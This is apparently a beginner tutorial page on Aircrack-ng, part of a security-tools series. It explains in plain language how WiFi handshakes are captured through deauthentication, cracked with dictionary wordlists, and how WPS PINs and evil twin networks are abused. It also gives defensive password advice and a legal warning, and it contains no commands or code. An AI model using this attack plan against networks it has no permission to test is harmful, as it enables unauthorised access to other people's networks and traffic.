Aircrack-ng: Wireless Security Auditing
Assessing the security of WiFi networks.
Learn how to monitor, attack, test, and crack wireless security protocols.
How to Test
Wi-Fi Safety.
A simple guide to Aircrack-ng. Learn how professionals check if a Wi-Fi network is strong, or if it can be broken into easily.
Invisible Signals
Think of Aircrack-ng as a Swiss Army Knife for Wi-Fi. It is not just one tool, but a box of tools used together to check how safe a wireless network really is.
When you connect to Wi-Fi, your device sends invisible messages through the air. Aircrack-ng lets you catch these messages, read them, and test if the password protecting them is too weak.
Target: Check Wi-Fi locks
Action: Grab flying data
Goal: Find the weak spots
_ready to start
Data = Letters
How Wi-Fi Works
Wi-Fi works like people throwing letters to each other across a room. Everyone in the room can see the letters flying. But, because the letters are in locked envelopes, only the person with the right key (the Wi-Fi password) can read what is inside.
Aircrack-ng works by catching these locked envelopes as they fly by.
The Hardware Rule
You cannot use just any laptop.
The Wi-Fi card inside a normal laptop is built to only listen to letters meant for you. It ignores everything else. To use Aircrack-ng, you must buy a special Wi-Fi card (usually one that plugs into a USB port).
Monitor Mode
The ability to hear every letter flying through the air, even the ones not meant for your computer.
Packet Injection
The ability to write your own fake letters and throw them into the air to trick the Wi-Fi router.
The 4 Main Tools
airmon-ng
"The Switch"
Turns your normal Wi-Fi card into a super-listener (puts it in Monitor Mode).
airodump-ng
"The Net"
Catches the invisible letters flying through the air and saves them to a file.
aireplay-ng
"The Trickster"
Throws fake letters at the router to make it do things, like kicking someone off the Wi-Fi.
aircrack-ng
"The Key Maker"
Takes the saved letters and guesses passwords really fast until it finds the right one.
WEP (The Old Lock)
WEP is a very old way to lock Wi-Fi. It is like a rusty padlock from the 1990s.
- Very weak.
- Aircrack-ng can break it in minutes.
- You should never use this today.
WPA (The Modern Safe)
WPA (and WPA2 / WPA3) is the modern way to lock Wi-Fi. It is like a heavy steel safe.
- Much stronger.
- Can only be broken if the password is easy to guess.
- The standard for homes today.
The Secret Knock
To break a modern WPA lock, Aircrack-ng needs to catch a specific moment in time called the 4-Way Handshake. Think of it like a secret knock at a door.
The Attack Plan
Here is how professionals test a network step-by-step.
-
1
Listen to the air. Turn on the tools to watch all Wi-Fi signals in the room.
-
2
Kick someone off. Send a fake message to force a phone to disconnect from the Wi-Fi.
-
3
Catch the knock. When the phone reconnects, grab the secret knock (handshake).
-
4
Guess the word. Take the knock home and try millions of passwords against it.
> Reading packets from file...
> 1 Handshake found!
> Starting Dictionary Attack...
Trying: password123
Trying: qwerty
Trying: letmein99
Trying: monkey
Trying: admin
KEY FOUND! [ letmein99 ]
* A "Dictionary Attack" is not magic. It simply reads a giant text file containing millions of common passwords and tries them all, one by one, super fast. If your password is not in that text file, Aircrack-ng cannot break it.
The PCAP File
When Aircrack-ng catches the "secret knock" (the handshake) from the air, it needs a place to store it. It saves this data into a special document called a .pcap file.
Think of a PCAP file as a digital box. Once you have the secret knock safely inside this box, you can turn off your Wi-Fi scanner and go home. You do not need to be near the target router to guess the password anymore.
Digital Nametags
00:1A:2B:3C:4D:5E
MAC Addresses
Every device that connects to Wi-Fi (your phone, your TV, the router itself) has a permanent nametag built into its computer chip. This is called a MAC Address.
When Airodump-ng is listening to the air, it uses these nametags to know exactly who is talking. It might see "Nametag A (Router) is throwing letters to Nametag B (Phone)." This helps professionals aim their tools at the right targets.
Wi-Fi Radio Channels
Wi-Fi is exactly like listening to the radio in your car. It has different stations (called channels). Most home routers use Channel 1, 6, or 11.
If a target router is talking on Channel 6, but your Aircrack-ng tool is listening on Channel 11, you will hear absolutely nothing. You must tell your tools to "tune the dial" to the exact right channel before you can catch any secret knocks.
The Dictionary File
Aircrack-ng cannot "do math" to find a password. It only guesses words you give it. You must give it a text file with millions of words on it. This is called a Wordlist.
One famous wordlist used by professionals is called rockyou.txt. It contains over
14 million passwords that real people used in the past. If the target's password is "Monkey123",
it is in the list and will be cracked. If their password is "PurpleElephantsDrinkingTea!", it is
not in the list, and Aircrack-ng will fail.
...line 4,501...
superman
iloveyou
password
monkey123
princess
...line 4,507...
Laptop Brain (CPU)
A normal computer brain is smart, but doing one specific math problem over and over is hard for it.
Gaming Brain (GPU)
Video game graphics cards are built to do thousands of simple math problems all at the exact same time.
The "Kick Off" Trick
Earlier we said Aircrack-ng needs to wait for someone to connect to the Wi-Fi so it can catch the secret knock. But what if nobody connects while you are watching? Professionals use a trick called a Deauthentication Attack.
Because Wi-Fi letters fly through the open air, the tool writes a fake letter. The letter says: "Hi Phone, this is the Router. Please disconnect immediately." The tool makes the letter look like it came from the real router.
The phone obeys, disconnects, and then realizes it lost Wi-Fi. It immediately tries to reconnect. When it reconnects, it sends the secret knock. We catch it.
Hidden Wi-Fi
Some people try to be safe by hiding their Wi-Fi name (so it does not show up on your phone). This does not stop Aircrack-ng.
Even if the name is hidden, the router is still throwing invisible letters. When a phone connects to that "hidden" router, the phone yells the real name out loud to find it. Aircrack-ng just listens to the phone, and instantly un-hides the Wi-Fi network.
The WPS Backdoor
WPS is a massive danger.
Many routers have a physical "WPS Button" on the back. It lets you connect a printer without typing a long password. Instead, it uses a short, 8-digit PIN number as a backdoor.
Because 8 digits is so short, a tool (similar to Aircrack-ng) called Reaver can guess this short PIN code very easily. Once it guesses the short PIN, the router just hands over the real, long Wi-Fi password for free.
WPS PIN
12345670
Very Easy to Guess
The Real Router
Name: "Cafe_Guest"
The real router at a coffee shop gives you internet safely.
The Evil Twin
Name: "Cafe_Guest"
A hacker uses tools to create a Fake Wi-Fi with the exact same name. If your phone connects to the fake one by accident, the hacker can see the websites you visit.
WPA3: The Future Safe
WPA3 fixes the biggest flaw in Wi-Fi.
The newest routers use WPA3 security. WPA3 completely changes how the "secret knock" works. The math is much smarter now.
With WPA3, Aircrack-ng cannot grab the secret knock and take it home to guess passwords a million times a second. WPA3 forces the hacker to talk directly to the router for every single guess, which makes guessing totally impossible.
WPA3 Status
UNBREAKABLE
(By dictionary attacks)
How to Protect Yourself
Make it Long
Because Aircrack-ng has to guess the word, a long password (12+ characters) takes too many years to guess. "BlueHorseEatsApples" is better than "P@ssw0rd1".
Check Your Lock Type
Look at your router settings. Make sure the security is set to WPA2 or WPA3. If it says WEP, change it immediately.
The Golden Rule
Testing a Wi-Fi network without permission from the owner is illegal. Professionals only use Aircrack-ng on networks they own or have been hired to test. Always stay safe and legal.
More in this series
Master more skills with other tutorials from the Wireless series.
Web Security
- SQLmap: Database Takeover: Automatic SQL injection and database exploit.
- BeEF: Browser Exploitation Framework: Assessing the security of web browsers.
- Nikto: Comprehensive Web Scanner: Identify server vulnerabilities and misconfigurations.
- DIRB: Web Content Scanner: Analyze web server directories and files.
- Gobuster: URI and DNS Buster: Discover hidden paths and subdomains.
- Burp Suite: Web Security Testing: The standard for web application security.
Networking
- Responder: Network Poisoning: Exploiting Windows network services.
- Ettercap: MITM Attacks: Sniffing and dissecting network traffic.
- Netcat: The Swiss Army Knife: Read and write data across network connections.
- Wireshark: Protocol Analysis: Uncovering the secrets of network traffic.
OSINT
- Maltego: Information Gathering: Visualizing relationships for intelligence gathering.
Wireless
- Kismet: Wireless Discovery: Sniffing and monitoring wireless networks.
- Aircrack-ng: Wireless Security Auditing: Assessing the security of WiFi networks.
Cryptography
- Hashcat: Password Recovery: The world's fastest password cracker.
- John the Ripper: Password Cracking: The fastest way to test password strength.
Forensics
- Autopsy: Digital Forensics: Uncovering digital evidence and recovering files.
Security
- Hydra: Login Cracker: A very fast network logon cracker.
- Metasploit: The Exploitation Framework: Mastering vulnerability assessment and exploitation.
- Nmap: Network Exploration and Security Auditing: The essential guide to scanning and mapping networks.